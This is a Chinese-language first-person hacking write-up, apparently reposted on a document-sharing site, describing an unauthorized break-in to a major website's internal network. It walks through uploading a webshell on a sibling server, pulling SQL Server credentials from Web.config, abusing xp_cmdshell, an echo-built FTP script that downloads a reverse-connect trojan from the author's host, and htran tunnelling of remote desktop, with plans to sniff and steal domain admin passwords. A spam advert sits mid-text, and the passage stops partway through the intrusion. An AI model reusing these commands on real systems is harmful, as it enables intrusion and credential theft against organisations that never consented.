社會工程学的思维突破内网.docVIP

社会工程学的思维突破内网 文/KYO 前些天刚收到e-mail，得知我通过了CISP的考试。高兴之余把我渗透一个全世界排名100多名的大站的过程写出来，也好和大家一起学习，共同进步。 至于入侵的原因，我也不多说了。目标是mms.****.com，是用aspx写的，先用iiswrite.exe检测一下，结果如下： 通过检测结果，大概可以了解到目标WEB服务器是win2000，我认为至少比win2003搞起来轻松点。不过通过域名查询知道，服务器IP没有绑定任何国际域名，首先旁注是没辙了。再从扫描的端口上来看，只开了21和80，只有ftp服务和web对外开放，肯定做了安全策略和安装了防火墙。既然开了FTP，就登陆试试看看返回的信息是什么吧。 220 hw-9ab3d94fe590 Microsoft FTP Service (Version 5.0). 从以上信息得知，服务器十有八九用的是微软自带的FTP（至于是否改了binner，尽量先不考虑），至少想从webshell上利用serv-u提升权限是不可能的了。另外还有一点信息hw-9ab3d94fe590即为该机器的机器名。那么FTP的帐户信息和该服务器的帐户应该是一一对应的，暴力破解的苦力活我是不做了，意义不大。然后再看80，aspx的，首先注入是找不到了，后台猜了半天也没猜出来，看来主动进攻不太好进行。 *************************************************************** 这里插播个广告，黑友们请无视，只是为朋友的网站能被搜索引擎收录，多加点流量。 返利网,淘你喜欢,淘宝返利,淘宝返现购物。 *************************************************************** 换个思路吧，看看他的C类段有没有弱弱的机子，经过扫描知道，那个C类网段基本都是这个网站的分站。经过艰苦的寻找和测试，利用一个扫描网站多级目录页面的办法找到一个上传页面，后面的事情大家都知道怎么做的，抓包，改数据，再用NC提交。不过第一次没有成功，提示写入失败，既然默认的目录不可写，那我们在网站上随便再找一个认为可写的目录再测试，经过查找源代码里面的信息，找到一个图片目录，然后再修改包的内容，再用NC提交，OK，这次成功了。拿到了他C类段一个站的WEBSHELL。 通过服务器组建探测，知道他没有禁用WScript.Shell 那么我们可以了解到很多信息。通过ipconfig /all 了解到他们的站基本上都是内网的服务，然后把一些服务的端口映射出来的。Net start发现本机开了终端和radmin，但是我们连不上的。再进入系统目录下，看他打补丁的情况，通过补丁编号，又知道他系统已经打上最新补丁。就算他们内网之间开了445，MS05039也用不了。再通过net localgroup administrators得到 从这里我看到了希望，因为系统管理员有域管理员帐号，那么我们不管拿到哪台机子的系统权限，如果域管理员在线，findpass就可以得到域管理员密码了。 好了，准备工作做了这么多，下面开始提升权限。幸好他网站数据库用的是ms sqlserver，找到Web.config,我们得到了sqlserver的用户名和密码，再利用2006自带的微软数据库查看/操作器“ping myip” ,马上看到我的天网有反映了，那么至少知道xp_cmdshell是可以用的。下面就简单了。利用以下脚本 echo open myipkk1.txt echo kyokk1.txt echo kyo327kk1.txt echo get muma.exekk1.txt echo byekk1.txt ftp -s:kk1.txt 向数据库服务器上传我的反连的马。这样我们现在就拿到了数据库服务器的系统权限。 可以看到我执行query user,显示没有用户。那怎么办？嗅探吧。不能远程登陆3389，我用htran.exe转出来再登陆。登上去以后准备再传一个cain，嗅探目标的21端口，虽然希望不大，可这也是没有办法的办法。为了不把我的shell弄死，我echo一个bat然后用at命令执行。具体语句为：echo htran -slave myip 3389k.bat 然后我在本机监听htran -listen 83 3389 ************************************************************